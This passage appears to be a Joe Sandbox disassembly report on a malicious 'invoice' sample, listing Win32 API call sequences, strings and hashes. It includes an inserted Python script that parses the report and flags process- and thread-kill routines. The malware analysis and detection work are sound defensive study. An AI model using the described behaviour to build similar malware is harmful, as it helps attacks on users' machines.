                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0022E1D1
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0022E1D8
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0022E1E0
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0022E1F7
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0022E209
                                                                • Part of subcall function 00229AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00229A05,00000000,00000000,?,00229DDB), ref: 0022A53A
                                                              Similarity
                                                              • API ID: CapsDevice$ExceptionRaiseRelease
                                                              • String ID:
                                                              • API String ID: 603618608-0
                                                              • Opcode ID: baab1f2f48ea4935a9bc91201e5204971aaddefd1f51e8bd710c58684c977cf9
                                                              • Instruction ID: 4f77bfff158c8faed5f2410e9a3c81d02f2eae6a53144408a62a4225ed78dca9
                                                              • Opcode Fuzzy Hash: baab1f2f48ea4935a9bc91201e5204971aaddefd1f51e8bd710c58684c977cf9
                                                              • Instruction Fuzzy Hash: F70121B5A40615BBEB109FA6AC49A5ABFB9EF48751F004066EA08A7290D6719C11CBA0
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 00217B47
                                                                • Part of subcall function 0021123A: __initp_misc_winsig.LIBCMT ref: 0021125E
                                                                • Part of subcall function 0021123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00217F51
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00217F65
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00217F78
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00217F8B
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00217F9E
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00217FB1
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00217FC4
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00217FD7
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00217FEA
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00217FFD
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00218010
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00218023
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00218036
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00218049
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0021805C
                                                                • Part of subcall function 0021123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0021806F
                                                              • __mtinitlocks.LIBCMT ref: 00217B4C
                                                                • Part of subcall function 00217E23: InitializeCriticalSectionAndSpinCount.KERNEL32(002AAC68,00000FA0,?,?,00217B51,00215E77,002A6C70,00000014), ref: 00217E41
                                                              • __mtterm.LIBCMT ref: 00217B55
                                                                • Part of subcall function 00217BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00217B5A,00215E77,002A6C70,00000014), ref: 00217D3F
                                                                • Part of subcall function 00217BBD: _free.LIBCMT ref: 00217D46
                                                                • Part of subcall function 00217BBD: DeleteCriticalSection.KERNEL32(002AAC68,?,?,00217B5A,00215E77,002A6C70,00000014), ref: 00217D68
                                                              • __calloc_crt.LIBCMT ref: 00217B7A
                                                              • GetCurrentThreadId.KERNEL32 ref: 00217BA3
                                                              Similarity
                                                              • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 2942034483-0
                                                              • Opcode ID: b9a35589211cdc7fb02688ae8ac22f4205ff06caa17202df2e318ba54ba7feba
                                                              • Instruction ID: acd6e94a6019b7da70b31d3f62ca08b29a9046db110869f1e92f36f65fe81b45
                                                              • Opcode Fuzzy Hash: b9a35589211cdc7fb02688ae8ac22f4205ff06caa17202df2e318ba54ba7feba
                                                              • Instruction Fuzzy Hash: 31F09C3153D3121AE6357B347C066CB26F49FA2734F204695F954C60D1FF2549F14961
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001F281D
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 001F2825
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001F2830
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001F283B
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 001F2843
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001F284B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 9f34252f5bb10f79b773a8a50e2862da4d6c276f382549c7203983121c9d5b5d
                                                              • Instruction ID: 82554e29038046329f1c155fcf853adf80857f821fad69ec5b229989961c79fd
                                                              • Opcode Fuzzy Hash: 9f34252f5bb10f79b773a8a50e2862da4d6c276f382549c7203983121c9d5b5d
                                                              • Instruction Fuzzy Hash: 8A0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F00411BA15C47A42C7F5A864CBE5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 1423608774-0
                                                              • Opcode ID: 78577ba3dcf22818ab6a9a82f8860c0a16ba8df8645c8ea9e6569424e8deb69b
                                                              • Instruction ID: 3a48d86906fa4e3d3fa47c7377a3037cf90df2f75038d9ca51ac8c6bbabee58f
                                                              • Opcode Fuzzy Hash: 78577ba3dcf22818ab6a9a82f8860c0a16ba8df8645c8ea9e6569424e8deb69b
                                                              • Instruction Fuzzy Hash: EF01F472112222ABD7141F98FC5CDEB7779FF89701F04016AF907A20A2DBB4AC91DB60
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00237C07
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00237C1D
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00237C2C
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00237C3B
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00237C45
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00237C4C
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 01761d81e1c8e9b98930795633a5a1befe48b9c722394dd451185cdfcc1c1dbf
                                                              • Instruction ID: 165b74ccaf268866a3284767c252e63013ce096d700cf0bc5a438e8e0a17fb7f
                                                              • Opcode Fuzzy Hash: 01761d81e1c8e9b98930795633a5a1befe48b9c722394dd451185cdfcc1c1dbf
                                                              • Instruction Fuzzy Hash: A1F03A72241159BBE7215B52BC0EEEF7B7CEFC6B11F000069FA0991051D7A05A81C6B5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00239A33
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A44
                                                              • TerminateThread.KERNEL32(?,000001F6,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A51
                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A5E
                                                                • Part of subcall function 002393D1: CloseHandle.KERNEL32(?,?,00239A6B,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 002393DB
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00239A71
                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,00265DEE,?,?,?,?,?,001FED63), ref: 00239A78
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: ffb119f58cf7acdd71f16b7dc13fb3301ac56288d56e80e88129a716962834a8
                                                              • Instruction ID: 5996535255b2178d6ef5a53bb228cfa426ebaeea6eefd39b80741bbeedb9e683
                                                              • Opcode Fuzzy Hash: ffb119f58cf7acdd71f16b7dc13fb3301ac56288d56e80e88129a716962834a8
                                                              • Instruction Fuzzy Hash: 2BF0E272141212ABD3111FA4FC8CDEB3739FF85301F040061F907A10B2DBB59892DB60
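The two API blocks above (the WM_CLOSE-then-OpenProcess/TerminateProcess routine at 00237C07 and the TerminateThread routine at 00239A33) are the kind of call sequence an analyst wants to pull out of a report like this automatically. The following parser and sequence rules are an added example and are not part of the Joe Sandbox report or its tooling. The excerpt embedded in it is constructed by copying those call lines from the report with the long "?" argument tails shortened; the rule names are the example's own, and the constant table uses standard Win32 values (WM_CLOSE = 0x10, PROCESS_ALL_ACCESS = 0x1F0FFF, SMTO_ABORTIFHUNG = 0x2, the VK_* codes seen in the MapVirtualKeyW block at 001F281D).

```python
"""Parse Joe Sandbox 'APIs' blocks and flag process/thread-kill sequences (added example)."""
import re
from dataclasses import dataclass

# Constructed excerpt: two "APIs" blocks copied from the report, argument tails shortened.
# Joe Sandbox prints one line per call; "?" marks an argument it could not resolve.
REPORT_EXCERPT = """\
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00237C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00237C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00237C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?), ref: 00237C3B
• TerminateProcess.KERNEL32(00000000,00000000,?), ref: 00237C45
• CloseHandle.KERNEL32(00000000,?), ref: 00237C4C
Memory Dump Source
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00239A33
• EnterCriticalSection.KERNEL32(?,?), ref: 00239A44
• TerminateThread.KERNEL32(?,000001F6,?), ref: 00239A51
• WaitForSingleObject.KERNEL32(?,000003E8,?), ref: 00239A5E
  • Part of subcall function 002393D1: CloseHandle.KERNEL32(?,?), ref: 002393DB
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00239A71
• LeaveCriticalSection.KERNEL32(?,?), ref: 00239A78
Memory Dump Source
"""

# One report line: optional subcall prefix, Api.MODULE(args), ref: address.
# The argument list is optional because some lines (e.g. LIBCMT calls) omit it.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants worth decoding, keyed by (API name, zero-based argument index).
KNOWN = {
    ("PostMessageW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 1): {0x10: "WM_CLOSE"},
    ("SendMessageTimeoutW", 4): {0x2: "SMTO_ABORTIFHUNG"},
    ("OpenProcess", 0): {0x1F0FFF: "PROCESS_ALL_ACCESS"},
    ("MapVirtualKeyW", 0): {0x5B: "VK_LWIN", 0x10: "VK_SHIFT", 0xA0: "VK_LSHIFT",
                            0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"},
}
PROCESS_TERMINATE = 0x0001  # access bit a handle needs for TerminateProcess to succeed


@dataclass
class ApiCall:
    api: str
    module: str
    args: list        # int for resolved hex values, None for "?"
    ref: int
    subcall: bool     # True when listed under "Part of subcall function"

    def describe(self) -> str:
        """Render the call with known constants decoded, e.g. PostMessageW(?,WM_CLOSE,0x0,0x0)."""
        parts = ["?" if a is None else KNOWN.get((self.api, i), {}).get(a, hex(a))
                 for i, a in enumerate(self.args)]
        return f"{self.api}({','.join(parts)}) @ {self.ref:08X}"


def parse_calls(text: str) -> list:
    """Split report text into per-function lists of ApiCall, one list per 'APIs' block."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = CALL_RE.match(line)
        if m is None or current is None:
            continue
        raw = m.group("args")
        args = [] if not raw else [None if tok == "?" else int(tok, 16) for tok in raw.split(",")]
        current.append(ApiCall(m.group("api"), m.group("mod"), args,
                               int(m.group("ref"), 16), m.group("sub") is not None))
    return [f for f in functions if f]


def triage(functions: list) -> list:
    """Apply sequence rules to each function; return (rule, evidence) findings in order."""
    findings = []
    for calls in functions:
        names = [c.api for c in calls]
        # Rule 1: WM_CLOSE to the window, then OpenProcess with terminate rights, then TerminateProcess.
        close = [c for c in calls if c.api in ("PostMessageW", "SendMessageTimeoutW")
                 and len(c.args) > 1 and c.args[1] == 0x10]
        opens = [c for c in calls if c.api == "OpenProcess" and c.args
                 and c.args[0] is not None and c.args[0] & PROCESS_TERMINATE]
        if close and opens and "TerminateProcess" in names[names.index("OpenProcess"):]:
            findings.append(("window-close-then-terminate-process",
                             [c.describe() for c in close + opens]))
        # Rule 2: TerminateThread is a forced kill; keep the exit code it passes as evidence.
        for c in calls:
            if c.api == "TerminateThread" and len(c.args) > 1 and c.args[1] is not None:
                findings.append(("terminate-thread", [c.describe(), f"exit_code={c.args[1]}"]))
    return findings


if __name__ == "__main__":
    for rule, evidence in triage(parse_calls(REPORT_EXCERPT)):
        print(rule, evidence)
```

Running it on the embedded excerpt yields one finding per function: the first block is flagged as a close-then-kill routine with its decoded WM_CLOSE and PROCESS_ALL_ACCESS arguments, the second as a forced thread termination with exit code 502 (0x1F6). Feeding the whole "APIs" section of the report through `parse_calls` gives the same per-function records for every entry on the page; the `KNOWN` table is the place to add further constants as they turn up.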
                                                              APIs
                                                                • Part of subcall function 0020F4EA: std::exception::exception.LIBCMT ref: 0020F51E
                                                                • Part of subcall function 0020F4EA: __CxxThrowException@8.LIBCMT ref: 0020F533
                                                              • __swprintf.LIBCMT ref: 001F1EA6
                                                              Strings
                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 001F1D49
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                              • API String ID: 2125237772-557222456
                                                              • Opcode ID: 36f0089ac1fa5d6cd20ac4a7dc80839ab29dfbea705f94be227f05e23cf419db
                                                              • Instruction ID: 45497593739346105c09885f7b719053cc60ab7edffda669c0ae70a17caab7e3
                                                              • Opcode Fuzzy Hash: 36f0089ac1fa5d6cd20ac4a7dc80839ab29dfbea705f94be227f05e23cf419db
                                                              • Instruction Fuzzy Hash: B8917B72118209EFC724FF24C895C7AB7A4BFA5700F14491DFA86972A2DB70ED54CB92
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0024B006
                                                              • CharUpperBuffW.USER32(?,?), ref: 0024B115
                                                              • VariantClear.OLEAUT32(?), ref: 0024B298
                                                                • Part of subcall function 00239DC5: VariantInit.OLEAUT32(00000000), ref: 00239E05
                                                                • Part of subcall function 00239DC5: VariantCopy.OLEAUT32(?,?), ref: 00239E0E
                                                                • Part of subcall function 00239DC5: VariantClear.OLEAUT32(?), ref: 00239E1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: 1a2998bef13435f376955c6aacfb1e5dd0d3703e00c2ea027ec7ad944141bc6d
                                                              • Instruction ID: 890ea27d98ed1e80d0fac0f06d40fbb6df2673a8f705529942f013941b1c99d3
                                                              • Opcode Fuzzy Hash: 1a2998bef13435f376955c6aacfb1e5dd0d3703e00c2ea027ec7ad944141bc6d
                                                              • Instruction Fuzzy Hash: 52919B746183069FCB14DF24C58196BB7F4BF89700F04482DF98A8B3A2DB71E915CB92
                                                              APIs
                                                                • Part of subcall function 0020C6F4: _wcscpy.LIBCMT ref: 0020C717
                                                              • _memset.LIBCMT ref: 00235438
                                                              • GetMenuItemInfoW.USER32(?), ref: 00235467
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00235513
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0023553D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: d43b8baf0b85787b36fe08ba101a1ff0d31c2311eb200c51ffc7965a6f89ae79
                                                              • Instruction ID: 26757d9a5a07c1790de9cb4d779c2f96c22dd02f3c09cfb8a8bac94f44193e63
                                                              • Opcode Fuzzy Hash: d43b8baf0b85787b36fe08ba101a1ff0d31c2311eb200c51ffc7965a6f89ae79
                                                              • Instruction Fuzzy Hash: 9B5136F12347229BD3149F28C8446BBB7E8EF95350F940A2DF99ED3191DBA0DD608B52
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0023027B
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002302B1
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002302C2
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00230344
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              • Opcode ID: aeb99e0c324a4a24f737b8065660cc9a82121e25d84af81b75f3eaffd01b5a12
                                                              • Instruction ID: 14071bcfebb16a6be7b0e2e21ff76692d69244df969f0f7f01447467f989259d
                                                              • Opcode Fuzzy Hash: aeb99e0c324a4a24f737b8065660cc9a82121e25d84af81b75f3eaffd01b5a12
                                                              • Instruction Fuzzy Hash: 29415AB1620205EFDB05CF54C8E4B9A7BB9EF45310F1480A9AA09DF206D7B1DE54CBB1
                                                              APIs
                                                              • _memset.LIBCMT ref: 00235075
                                                              • GetMenuItemInfoW.USER32 ref: 00235091
                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 002350D7
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002B1708,00000000), ref: 00235120
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 9540668d868702247c2089b1a09ae45fc3f7d602263d1c8573073deeff3cdb12
                                                              • Instruction ID: 88def3fd958528fe761d345f4a65e4234511491ce36a1e7519d4162a050f03b3
                                                              • Opcode Fuzzy Hash: 9540668d868702247c2089b1a09ae45fc3f7d602263d1c8573073deeff3cdb12
                                                              • Instruction Fuzzy Hash: 444113B12147129FD720DF24EC84B2AB7E8AF89324F044A5EF89D97281D730E910CB62
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0023E742
                                                              • GetLastError.KERNEL32(?,00000000), ref: 0023E768
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0023E78D
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0023E7B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID: p1#v`K$v
                                                              • API String ID: 3321077145-1068180069
                                                              • Opcode ID: 25af63cde53b8e5f2bb0294799f7dde410b01f94f672a55733a88a2574705525
                                                              • Instruction ID: c25abd26ad97031d935dd91eed3abd7689cbf47041f0a4668be74dcbd12796e5
                                                              • Opcode Fuzzy Hash: 25af63cde53b8e5f2bb0294799f7dde410b01f94f672a55733a88a2574705525
                                                              • Instruction Fuzzy Hash: A1412579200615DFCF11EF25C445A5DBBE5BF99710F098089EA0AAB3A2CB30FC55CB91
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00250587
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
